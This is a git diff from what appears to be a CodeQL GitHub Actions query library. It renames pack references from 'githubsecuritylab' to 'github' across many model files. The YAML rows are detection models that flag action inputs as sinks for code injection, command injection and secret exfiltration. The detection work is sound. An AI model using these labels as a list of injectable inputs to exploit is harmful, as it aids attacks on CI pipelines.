.../benc-uk_workflow-dispatch.model.yml | 2 +- .../reusable-workflows/bridgecrewio_checkov.model.yml | 2 +- .../reusable-workflows/bugsnag_bugsnag-ruby.model.yml | 2 +- .../bytecodealliance_wasm-micro-runtime.model.yml | 2 +- .../reusable-workflows/celo-org_celo-blockchain.model.yml | 2 +- .../reusable-workflows/cemu-project_cemu.model.yml | 2 +- .../reusable-workflows/cesiumgs_cesium-unreal.model.yml | 2 +- .../ext/generated/reusable-workflows/cgal_cgal.model.yml | 2 +- .../reusable-workflows/checkstyle_checkstyle.model.yml | 2 +- .../reusable-workflows/chia-network_actions.model.yml | 2 +- .../reusable-workflows/chipsalliance_chisel.model.yml | 2 +- .../reusable-workflows/clickhouse_clickhouse.model.yml | 2 +- .../reusable-workflows/cloudfoundry_cli.model.yml | 2 +- ...loudposse_github-action-matrix-outputs-write.model.yml | 2 +- .../generated/reusable-workflows/cocotb_cocotb.model.yml | 2 +- .../codeigniter4_codeigniter4.model.yml | 2 +- .../reusable-workflows/com-lihaoyi_mill.model.yml | 2 +- .../generated/reusable-workflows/cosmos_ibc-go.model.yml | 2 +- .../reusable-workflows/crowdsecurity_crowdsec.model.yml | 2 +- .../reusable-workflows/cryptomator_cryptomator.model.yml | 2 +- .../reusable-workflows/daeuniverse_dae.model.yml | 2 +- .../reusable-workflows/dafny-lang_dafny.model.yml | 2 +- .../generated/reusable-workflows/dagger_dagger.model.yml | 2 +- .../dash-industry-forum_dash.js.model.yml | 2 +- .../reusable-workflows/datadog_dd-trace-go.model.yml | 2 +- .../reusable-workflows/datadog_dd-trace-py.model.yml | 2 +- .../reusable-workflows/datafuselabs_databend.model.yml | 2 +- .../reusable-workflows/dbt-labs_dbt-bigquery.model.yml | 2 +- .../reusable-workflows/dbt-labs_dbt-core.model.yml | 2 +- .../reusable-workflows/dbt-labs_dbt-snowflake.model.yml | 2 +- .../reusable-workflows/decidim_decidim.model.yml | 2 +- .../defectdojo_django-defectdojo.model.yml | 2 +- .../dependencytrack_dependency-track.model.yml | 2 +- 
.../reusable-workflows/devexpress_testcafe.model.yml | 2 +- .../generated/reusable-workflows/dfhack_dfhack.model.yml | 2 +- .../reusable-workflows/docker_build-push-action.model.yml | 2 +- .../dragonwell-project_dragonwell11.model.yml | 2 +- .../reusable-workflows/earthly_earthly.model.yml | 2 +- .../reusable-workflows/eclipse-vertx_vert.x.model.yml | 2 +- .../eclipse-vertx_vertx-sql-client.model.yml | 2 +- .../elastic_elasticsearch-net.model.yml | 2 +- .../element-hq_element-desktop.model.yml | 4 ++-- .../reusable-workflows/envoyproxy_envoy.model.yml | 2 +- .../generated/reusable-workflows/etcd-io_bbolt.model.yml | 2 +- .../generated/reusable-workflows/etcd-io_etcd.model.yml | 2 +- .../reusable-workflows/eventstore_eventstore.model.yml | 2 +- .../generated/reusable-workflows/expensify_app.model.yml | 2 +- .../external-secrets_external-secrets.model.yml | 2 +- .../facebook_create-react-app.model.yml | 2 +- .../facebookresearch_xformers.model.yml | 2 +- .../reusable-workflows/falcosecurity_falco.model.yml | 2 +- .../reusable-workflows/fastify_fastify.model.yml | 2 +- .../reusable-workflows/ferretdb_ferretdb.model.yml | 2 +- .../reusable-workflows/filecoin-project_venus.model.yml | 2 +- .../firebase_firebase-unity-sdk.model.yml | 2 +- .../reusable-workflows/flarum_framework.model.yml | 2 +- .../reusable-workflows/fluent_fluent-bit.model.yml | 2 +- .../reusable-workflows/flux-iac_tofu-controller.model.yml | 2 +- .../generated/reusable-workflows/flyteorg_flyte.model.yml | 2 +- .../reusable-workflows/foundatiofx_foundatio.model.yml | 2 +- .../reusable-workflows/freecad_freecad.model.yml | 2 +- .../reusable-workflows/getpelican_pelican.model.yml | 2 +- .../reusable-workflows/getporter_porter.model.yml | 2 +- .../reusable-workflows/getsentry_sentry-dart.model.yml | 2 +- .../reusable-workflows/getsentry_sentry-unity.model.yml | 2 +- .../reusable-workflows/gitpod-io_gitpod.model.yml | 2 +- .../reusable-workflows/gittools_gitversion.model.yml | 2 +- 
.../googlecloudplatform_magic-modules.model.yml | 2 +- .../googlecloudplatform_nodejs-docs-samples.model.yml | 2 +- .../reusable-workflows/gravitational_teleport.model.yml | 2 +- .../reusable-workflows/gravitl_netmaker.model.yml | 2 +- .../ext/generated/reusable-workflows/h2oai_wave.model.yml | 2 +- .../reusable-workflows/hadashia_vcontainer.model.yml | 2 +- .../hashgraph_hedera-services.model.yml | 2 +- .../reusable-workflows/hashicorp_boundary.model.yml | 2 +- .../reusable-workflows/hashicorp_consul.model.yml | 2 +- .../reusable-workflows/hashicorp_terraform-cdk.model.yml | 2 +- .../hashicorp_terraform-provider-tfe.model.yml | 2 +- .../reusable-workflows/hashicorp_terraform.model.yml | 2 +- .../reusable-workflows/hashicorp_vault.model.yml | 4 ++-- .../ext/generated/reusable-workflows/heroku_cli.model.yml | 2 +- .../reusable-workflows/hitobito_hitobito.model.yml | 4 ++-- .../home-assistant_operating-system.model.yml | 2 +- .../homuler_mediapipeunityplugin.model.yml | 2 +- .../reusable-workflows/huggingface_doc-builder.model.yml | 2 +- .../reusable-workflows/huggingface_transformers.model.yml | 2 +- .../hyperion-project_hyperion.ng.model.yml | 2 +- .../ext/generated/reusable-workflows/ibm_sarama.model.yml | 2 +- ...d-photos-downloader_icloud_photos_downloader.model.yml | 2 +- .../reusable-workflows/immich-app_immich.model.yml | 2 +- .../generated/reusable-workflows/inria_spoon.model.yml | 2 +- .../intel_intel-device-plugins-for-kubernetes.model.yml | 2 +- .../reusable-workflows/inverse-inc_packetfence.model.yml | 2 +- .../ext/generated/reusable-workflows/ispc_ispc.model.yml | 2 +- .../jetbrains_intellij-platform-gradle-plugin.model.yml | 2 +- .../reusable-workflows/jupyter_docker-stacks.model.yml | 2 +- .../reusable-workflows/kairos-io_kairos.model.yml | 2 +- .../generated/reusable-workflows/kanidm_kanidm.model.yml | 2 +- .../kata-containers_kata-containers.model.yml | 2 +- .../generated/reusable-workflows/kiali_kiali.model.yml | 2 +- 
.../generated/reusable-workflows/kotest_kotest.model.yml | 2 +- .../reusable-workflows/kubernetes_ingress-nginx.model.yml | 2 +- .../reusable-workflows/kubescape_kubescape.model.yml | 2 +- .../reusable-workflows/kubeshop_botkube.model.yml | 4 ++-- .../generated/reusable-workflows/kumahq_kuma.model.yml | 2 +- .../generated/reusable-workflows/labring_sealos.model.yml | 2 +- .../reusable-workflows/laion-ai_open-assistant.model.yml | 2 +- .../reusable-workflows/learningequality_kolibri.model.yml | 2 +- .../reusable-workflows/lensesio_stream-reactor.model.yml | 2 +- .../reusable-workflows/leptos-rs_leptos.model.yml | 2 +- .../lightning-ai_pytorch-lightning.model.yml | 2 +- .../reusable-workflows/liquibase_liquibase.model.yml | 2 +- .../reusable-workflows/litestar-org_litestar.model.yml | 2 +- .../ext/generated/reusable-workflows/llvm_circt.model.yml | 2 +- .../generated/reusable-workflows/lnbits_lnbits.model.yml | 2 +- .../generated/reusable-workflows/lutris_lutris.model.yml | 2 +- .../generated/reusable-workflows/mailu_mailu.model.yml | 2 +- .../reusable-workflows/mamba-org_mamba.model.yml | 2 +- .../manticoresoftware_manticoresearch.model.yml | 2 +- .../reusable-workflows/marcelotduarte_cx_freeze.model.yml | 2 +- ...rialdesigninxaml_materialdesigninxamltoolkit.model.yml | 2 +- .../reusable-workflows/matter-labs_zksync-era.model.yml | 2 +- .../reusable-workflows/mattermost_desktop.model.yml | 2 +- .../reusable-workflows/mattermost_mattermost.model.yml | 2 +- .../reusable-workflows/mealie-recipes_mealie.model.yml | 2 +- .../reusable-workflows/meshery_meshery.model.yml | 2 +- .../reusable-workflows/meshtastic_firmware.model.yml | 2 +- .../reusable-workflows/microcks_microcks.model.yml | 2 +- .../microsoft_applicationinsights-java.model.yml | 2 +- .../reusable-workflows/microsoft_chat-copilot.model.yml | 2 +- .../reusable-workflows/microsoft_msquic.model.yml | 2 +- .../generated/reusable-workflows/microsoft_oryx.model.yml | 2 +- 
.../reusable-workflows/microsoft_pr-metrics.model.yml | 2 +- .../microsoft_react-native-windows-samples.model.yml | 2 +- .../microsoft_vscode-cpptools.model.yml | 2 +- .../generated/reusable-workflows/moby_buildkit.model.yml | 2 +- .../ext/generated/reusable-workflows/moby_moby.model.yml | 2 +- .../reusable-workflows/mosaicml_composer.model.yml | 2 +- .../reusable-workflows/msys2_setup-msys2.model.yml | 2 +- .../generated/reusable-workflows/mudler_localai.model.yml | 2 +- .../reusable-workflows/mustardchef_wsabuilds.model.yml | 2 +- .../ext/generated/reusable-workflows/n8n-io_n8n.model.yml | 2 +- .../generated/reusable-workflows/napari_napari.model.yml | 2 +- .../generated/reusable-workflows/nasa_fprime.model.yml | 2 +- .../reusable-workflows/nautobot_nautobot.model.yml | 2 +- .../ext/generated/reusable-workflows/nektos_act.model.yml | 2 +- .../reusable-workflows/neondatabase_neon.model.yml | 2 +- .../generated/reusable-workflows/neovim_neovim.model.yml | 2 +- .../reusable-workflows/nethermindeth_nethermind.model.yml | 2 +- .../newrelic_newrelic-dotnet-agent.model.yml | 2 +- .../newrelic_newrelic-java-agent.model.yml | 2 +- .../reusable-workflows/newrelic_node-newrelic.model.yml | 2 +- .../reusable-workflows/nexus-mods_nexusmods.app.model.yml | 2 +- .../nginxinc_kubernetes-ingress.model.yml | 2 +- .../generated/reusable-workflows/nocodb_nocodb.model.yml | 2 +- .../generated/reusable-workflows/novuhq_novu.model.yml | 2 +- .../generated/reusable-workflows/npm_abbrev-js.model.yml | 2 +- ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml | 2 +- .../reusable-workflows/npm_fs-minipass.model.yml | 2 +- .../reusable-workflows/npm_hosted-git-info.model.yml | 2 +- ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml | 2 +- .../npm_json-parse-even-better-errors.model.yml | 2 +- .../npm_minify-registry-metadata.model.yml | 2 +- .../reusable-workflows/npm_mute-stream.model.yml | 2 +- .../reusable-workflows/npm_node-semver.model.yml | 2 +- 
.../generated/reusable-workflows/npm_node-which.model.yml | 2 +- .../ext/generated/reusable-workflows/npm_nopt.model.yml | 2 +- .../npm_normalize-package-data.model.yml | 2 +- .../reusable-workflows/npm_write-file-atomic.model.yml | 2 +- .../generated/reusable-workflows/onflow_cadence.model.yml | 2 +- .../reusable-workflows/open-goal_jak-project.model.yml | 2 +- .../open-telemetry_opentelemetry-demo.model.yml | 2 +- .../open-telemetry_opentelemetry-dotnet-contrib.model.yml | 2 +- .../open-telemetry_opentelemetry-dotnet.model.yml | 2 +- ...telemetry_opentelemetry-java-instrumentation.model.yml | 2 +- .../open-telemetry_opentelemetry-js-contrib.model.yml | 2 +- .../open-telemetry_opentelemetry-operator.model.yml | 2 +- .../reusable-workflows/openbao_openbao.model.yml | 2 +- .../reusable-workflows/openhab_openhab-docs.model.yml | 2 +- .../reusable-workflows/openmined_pysyft.model.yml | 2 +- .../reusable-workflows/opentofu_opentofu.model.yml | 2 +- .../reusable-workflows/openttd_openttd.model.yml | 2 +- .../reusable-workflows/openvinotoolkit_openvino.model.yml | 2 +- .../generated/reusable-workflows/openxla_iree.model.yml | 2 +- .../generated/reusable-workflows/openzfs_zfs.model.yml | 2 +- .../operator-framework_java-operator-sdk.model.yml | 2 +- .../reusable-workflows/orange-opensource_hurl.model.yml | 2 +- .../paolosalvatori_servicebusexplorer.model.yml | 2 +- .../reusable-workflows/parcel-bundler_parcel.model.yml | 2 +- .../reusable-workflows/pardeike_harmony.model.yml | 2 +- .../generated/reusable-workflows/pcsx2_pcsx2.model.yml | 2 +- .../reusable-workflows/pennylaneai_pennylane.model.yml | 2 +- .../pinecone-io_pinecone-python-client.model.yml | 2 +- .../generated/reusable-workflows/pixie-io_pixie.model.yml | 2 +- .../reusable-workflows/plantuml_plantuml.model.yml | 2 +- .../generated/reusable-workflows/powerdns_pdns.model.yml | 2 +- .../reusable-workflows/preactjs_preact.model.yml | 2 +- .../prismlauncher_prismlauncher.model.yml | 2 +- 
.../reusable-workflows/product-os_flowzone.model.yml | 2 +- .../reusable-workflows/project-oak_oak.model.yml | 2 +- .../ext/generated/reusable-workflows/prql_prql.model.yml | 2 +- .../generated/reusable-workflows/pulumi_pulumi.model.yml | 2 +- .../reusable-workflows/puppeteer_puppeteer.model.yml | 2 +- .../puppetlabs_puppetlabs-puppetdb.model.yml | 2 +- .../generated/reusable-workflows/pyo3_maturin.model.yml | 2 +- .../ext/generated/reusable-workflows/pyo3_pyo3.model.yml | 2 +- .../generated/reusable-workflows/python_cpython.model.yml | 2 +- .../reusable-workflows/pytorch_botorch.model.yml | 2 +- .../generated/reusable-workflows/pytorch_xla.model.yml | 2 +- .../reusable-workflows/quarto-dev_quarto-cli.model.yml | 2 +- .../reusable-workflows/rancher_dashboard.model.yml | 2 +- .../reusable-workflows/rasterio_rasterio.model.yml | 2 +- .../reusable-workflows/redisearch_redisearch.model.yml | 2 +- .../reusable-workflows/remix-run_remix.model.yml | 2 +- .../reusable-workflows/rmcrackan_libation.model.yml | 2 +- .../reusable-workflows/rocketchat_rocket.chat.model.yml | 2 +- .../generated/reusable-workflows/ruby_ruby.wasm.model.yml | 2 +- .../reusable-workflows/rustdesk_rustdesk.model.yml | 2 +- .../reusable-workflows/saadeghi_daisyui.model.yml | 2 +- .../generated/reusable-workflows/sagemath_sage.model.yml | 2 +- .../reusable-workflows/schemastore_schemastore.model.yml | 2 +- .../scikit-learn_scikit-learn.model.yml | 2 +- .../reusable-workflows/seleniumhq_selenium.model.yml | 2 +- .../shaka-project_shaka-packager.model.yml | 2 +- .../shaka-project_shaka-player.model.yml | 2 +- .../reusable-workflows/shimataro_ssh-key-action.model.yml | 2 +- .../reusable-workflows/softfever_orcaslicer.model.yml | 2 +- .../software-mansion_react-native-reanimated.model.yml | 2 +- .../reusable-workflows/solana-labs_solana.model.yml | 2 +- .../generated/reusable-workflows/sonarr_sonarr.model.yml | 2 +- .../reusable-workflows/speedb-io_speedb.model.yml | 2 +- 
.../spring-cloud_spring-cloud-dataflow.model.yml | 2 +- .../reusable-workflows/sqlfluff_sqlfluff.model.yml | 2 +- .../reusable-workflows/stdlib-js_stdlib.model.yml | 2 +- .../reusable-workflows/stereokit_stereokit.model.yml | 2 +- .../streetsidesoftware_cspell.model.yml | 4 ++-- .../generated/reusable-workflows/supabase_auth.model.yml | 2 +- .../generated/reusable-workflows/supabase_cli.model.yml | 2 +- .../generated/reusable-workflows/tencent_hippy.model.yml | 4 ++-- .../reusable-workflows/tgstation_tgstation.model.yml | 2 +- .../reusable-workflows/thesofproject_sof.model.yml | 2 +- .../generated/reusable-workflows/tiann_kernelsu.model.yml | 2 +- .../reusable-workflows/tiledb-inc_tiledb.model.yml | 2 +- .../reusable-workflows/toeverything_affine.model.yml | 2 +- .../generated/reusable-workflows/tracel-ai_burn.model.yml | 2 +- .../reusable-workflows/tribler_tribler.model.yml | 2 +- .../reusable-workflows/ubisoft_sharpmake.model.yml | 2 +- .../unity-technologies_ml-agents.model.yml | 2 +- .../generated/reusable-workflows/urbit_urbit.model.yml | 2 +- .../reusable-workflows/uyuni-project_uyuni.model.yml | 2 +- .../reusable-workflows/vert-x3_vertx-hazelcast.model.yml | 2 +- .../ext/generated/reusable-workflows/vkcom_vkui.model.yml | 2 +- .../reusable-workflows/walletconnect_web3modal.model.yml | 2 +- .../reusable-workflows/warzone2100_warzone2100.model.yml | 2 +- .../reusable-workflows/wasmedge_wasmedge.model.yml | 2 +- .../reusable-workflows/web-infra-dev_rspack.model.yml | 2 +- .../ext/generated/reusable-workflows/werf_werf.model.yml | 2 +- .../reusable-workflows/widdix_aws-cf-templates.model.yml | 2 +- .../reusable-workflows/wildfly_wildfly.model.yml | 2 +- .../generated/reusable-workflows/yt-dlp_yt-dlp.model.yml | 2 +- .../generated/reusable-workflows/zenml-io_zenml.model.yml | 2 +- .../zephyrproject-rtos_zephyr.model.yml | 2 +- .../reusable-workflows/zitadel_zitadel.model.yml | 4 ++-- ql/lib/ext/getsentry_action-release.model.yml | 2 +- 
ql/lib/ext/github_codeql-action.model.yml | 2 +- ql/lib/ext/go-semantic-release_action.model.yml | 2 +- ql/lib/ext/golangci_golangci-lint-action.model.yml | 2 +- ql/lib/ext/gonuit_heroku-docker-deploy.model.yml | 2 +- ql/lib/ext/goreleaser_goreleaser-action.model.yml | 2 +- .../gr2m_create-or-update-pull-request-action.model.yml | 2 +- ql/lib/ext/gradle_gradle-build-action.model.yml | 2 +- ql/lib/ext/haya14busa_action-cond.model.yml | 2 +- ql/lib/ext/hexlet_project-action.model.yml | 2 +- ql/lib/ext/ilammy_msvc-dev-cmd.model.yml | 2 +- ql/lib/ext/ilammy_setup-nasm.model.yml | 2 +- ql/lib/ext/imjohnbo_issue-bot.model.yml | 2 +- ql/lib/ext/iterative_setup-cml.model.yml | 2 +- ql/lib/ext/iterative_setup-dvc.model.yml | 2 +- ql/lib/ext/jamesives_github-pages-deploy-action.model.yml | 2 +- ql/lib/ext/jitterbit_get-changed-files.model.yml | 2 +- ql/lib/ext/johnnymorganz_stylua-action.model.yml | 2 +- ql/lib/ext/jsdaniell_create-json.model.yml | 2 +- ql/lib/ext/jurplel_install-qt-action.model.yml | 2 +- ql/lib/ext/jwalton_gh-ecr-push.model.yml | 4 ++-- ql/lib/ext/khan_pull-request-comment-trigger.model.yml | 2 +- ...arsoner_circleci-artifacts-redirector-action.model.yml | 2 +- ql/lib/ext/leafo_gh-actions-lua.model.yml | 2 +- ql/lib/ext/leafo_gh-actions-luarocks.model.yml | 2 +- ql/lib/ext/lucasbento_auto-close-issues.model.yml | 2 +- .../ext/mad9000_actions-find-and-replace-string.model.yml | 2 +- ql/lib/ext/magefile_mage-action.model.yml | 2 +- ql/lib/ext/maierj_fastlane-action.model.yml | 2 +- ql/lib/ext/manusa_actions-setup-minikube.model.yml | 2 +- ql/lib/ext/marocchino_on_artifact.model.yml | 2 +- ql/lib/ext/mattdavis0351_actions.model.yml | 4 ++-- ql/lib/ext/meteorengineer_setup-meteor.model.yml | 2 +- ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml | 2 +- ql/lib/ext/microsoft_setup-msbuild.model.yml | 2 +- ql/lib/ext/mishakav_pytest-coverage-comment.model.yml | 2 +- .../ext/mr-smithers-excellent_docker-build-push.model.yml | 2 +- 
ql/lib/ext/msys2_setup-msys2.model.yml | 2 +- ql/lib/ext/mxschmitt_action-tmate.model.yml | 2 +- ql/lib/ext/mymindstorm_setup-emsdk.model.yml | 4 ++-- ql/lib/ext/nanasess_setup-chromedriver.model.yml | 2 +- ql/lib/ext/nanasess_setup-php.model.yml | 2 +- ql/lib/ext/nick-fields_retry.model.yml | 2 +- ql/lib/ext/octokit_graphql-action.model.yml | 2 +- ql/lib/ext/octokit_request-action.model.yml | 2 +- ql/lib/ext/olafurpg_setup-scala.model.yml | 2 +- ql/lib/ext/paambaati_codeclimate-action.model.yml | 2 +- ql/lib/ext/peter-evans_create-pull-request.model.yml | 2 +- .../ext/peter-murray_issue-body-parser-action.model.yml | 2 +- ql/lib/ext/plasmicapp_plasmic-action.model.yml | 2 +- ql/lib/ext/preactjs_compressed-size-action.model.yml | 2 +- ql/lib/ext/py-actions_flake8.model.yml | 2 +- ql/lib/ext/py-actions_py-dependency-install.model.yml | 2 +- ql/lib/ext/pyo3_maturin-action.model.yml | 2 +- .../ext/reactivecircus_android-emulator-runner.model.yml | 2 +- .../redhat-plumbers-in-action_download-artifact.model.yml | 2 +- ql/lib/ext/reggionick_s3-deploy.model.yml | 2 +- ql/lib/ext/renovatebot_github-action.model.yml | 2 +- ql/lib/ext/roots_issue-closer-action.model.yml | 2 +- ql/lib/ext/ros-tooling_setup-ros.model.yml | 2 +- ql/lib/ext/ruby_setup-ruby.model.yml | 4 ++-- .../salsify_action-detect-and-tag-new-version.model.yml | 4 ++-- ql/lib/ext/sergeysova_jq-action.model.yml | 2 +- ql/lib/ext/shallwefootball_upload-s3-action.model.yml | 2 +- ql/lib/ext/shogo82148_actions-setup-perl.model.yml | 2 +- ql/lib/ext/skitionek_notify-microsoft-teams.model.yml | 2 +- ql/lib/ext/snow-actions_eclint.model.yml | 2 +- ql/lib/ext/stackhawk_hawkscan-action.model.yml | 2 +- ql/lib/ext/step-security_harden-runner.model.yml | 2 +- ql/lib/ext/suisei-cn_actions-download-file.model.yml | 2 +- ql/lib/ext/tibdex_backport.model.yml | 2 +- ql/lib/ext/timheuer_base64-to-file.model.yml | 2 +- ql/lib/ext/tj-actions_branch-names.model.yml | 2 +- ql/lib/ext/trilom_file-changes-action.model.yml | 2 +- 
ql/lib/ext/tripss_conventional-changelog-action.model.yml | 2 +- ql/lib/ext/tryghost_action-deploy-theme.model.yml | 2 +- ql/lib/ext/tzkhan_pr-update-action.model.yml | 2 +- ql/lib/ext/veracode_veracode-sca.model.yml | 2 +- ql/lib/ext/wearerequired_lint-action.model.yml | 2 +- ql/lib/ext/webfactory_ssh-agent.model.yml | 2 +- ql/lib/ext/workflow-models/workflow-models.yml | 8 ++++---- ql/lib/ext/xt0rted_slash-command-action.model.yml | 2 +- ql/lib/ext/zaproxy_action-baseline.model.yml | 2 +- ql/lib/ext/zaproxy_action-full-scan.model.yml | 2 +- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 4 ++-- ql/test/qlpack.yml | 6 +++--- 748 files changed, 777 insertions(+), 777 deletions(-)
diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js
index 7bb3039fe486..7281eb9d9b51 100644
--- a/.github/action/dist/index.js
+++ b/.github/action/dist/index.js
@@ -28606,7 +28606,7 @@ async function newCodeQL() {
 return {
 language: "javascript",
 path: await findCodeQL(),
- pack: "githubsecuritylab/actions-queries",
+ pack: "github/actions-queries",
 suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`,
 source_root: core.getInput("source-root"),
 output: core.getInput("sarif"),
diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts
index 08c4b420a4ca..5b06b007d8ae 100644
--- a/.github/action/src/codeql.ts
+++ b/.github/action/src/codeql.ts
@@ -26,7 +26,7 @@ export async function newCodeQL(): Promise {
 return {
 language: "javascript",
 path: await findCodeQL(),
- pack: "githubsecuritylab/actions-queries",
+ pack: "github/actions-queries",
 suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`,
 source_root: core.getInput("source-root"),
 output: core.getInput("sarif"),
diff --git a/ql/lib/ext/8398a7_action-slack.model.yml b/ql/lib/ext/8398a7_action-slack.model.yml
index b897e8f2c5a4..5687a9729fca 100644
--- a/ql/lib/ext/8398a7_action-slack.model.yml
+++ b/ql/lib/ext/8398a7_action-slack.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["8398a7/action-slack", "*", "input.custom_payload", "code-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml b/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml
index 3a5b34880b95..87620afac709 100644
--- a/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml
+++ b/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["SonarSource/sonarcloud-github-action", "*", "input.args", "secret-exfiltration", "manual"]
diff --git a/ql/lib/ext/actions_github-script.model.yml b/ql/lib/ext/actions_github-script.model.yml
index 20abd5328727..f02d8f5b180a 100644
--- a/ql/lib/ext/actions_github-script.model.yml
+++ b/ql/lib/ext/actions_github-script.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["actions/github-script", "*", "input.script", "code-injection", "manual"]
diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml
index dcc20433483f..77df62717b0d 100644
--- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml
+++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSourceModel
 data:
 - ["ahmadnassri/action-changed-files", "*", "output.files", "filename", "manual"]
diff --git a/ql/lib/ext/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/akhileshns_heroku-deploy.model.yml
index 3afd9991e073..abdcdd6d6986 100644
--- a/ql/lib/ext/akhileshns_heroku-deploy.model.yml
+++ b/ql/lib/ext/akhileshns_heroku-deploy.model.yml
@@ -1,11 +1,11 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSummaryModel
 data:
 - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint", "manual"]
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["akhileshns/heroku-deploy", "*", "input.heroku_app_name", "command-injection", "manual"]
diff --git a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml
index 3deae2a9f197..ecfdbfb98a0b 100644
--- a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml
+++ b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSourceModel
 data:
 - ["amannn/action-semantic-pull-request", "*", "output.error_message", "text", "manual"]
diff --git a/ql/lib/ext/anchore_sbom-action.model.yml b/ql/lib/ext/anchore_sbom-action.model.yml
index 7dd0459ab7f9..ea7ab3125284 100644
--- a/ql/lib/ext/anchore_sbom-action.model.yml
+++ b/ql/lib/ext/anchore_sbom-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["anchore/sbom-action", "*", "input.syft-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/anchore_scan-action.model.yml b/ql/lib/ext/anchore_scan-action.model.yml
index 721042aafaf0..21ea405b32c5 100644
--- a/ql/lib/ext/anchore_scan-action.model.yml
+++ b/ql/lib/ext/anchore_scan-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["anchore/scan-action", "*", "input.grype-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/andresz1_size-limit-action.model.yml b/ql/lib/ext/andresz1_size-limit-action.model.yml index ee4dbaf2b55e..1e95a8c02736 100644 --- a/ql/lib/ext/andresz1_size-limit-action.model.yml +++ b/ql/lib/ext/andresz1_size-limit-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["andresz1/size-limit-action", "*", "input.package_manager", "command-injection", "manual"] diff --git a/ql/lib/ext/android-actions_setup-android.model.yml b/ql/lib/ext/android-actions_setup-android.model.yml index 76ae920d2550..1ecba6ef1a18 100644 --- a/ql/lib/ext/android-actions_setup-android.model.yml +++ b/ql/lib/ext/android-actions_setup-android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint", "manual"] diff --git a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml index 46f667d75a01..5d7cb6e0b916 100644 --- a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml +++ b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint", "manual"] diff --git a/ql/lib/ext/asdf-vm_actions.model.yml b/ql/lib/ext/asdf-vm_actions.model.yml index 4df6fe61a43f..26b2e2eb693a 100644 --- a/ql/lib/ext/asdf-vm_actions.model.yml +++ b/ql/lib/ext/asdf-vm_actions.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["asdf-vm/actions", "*", "input.before_install", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml index aab329160ea1..99324837e759 100644 --- a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml +++ b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml index 610d188f0655..cd827ffc2f87 100644 --- a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml +++ b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - 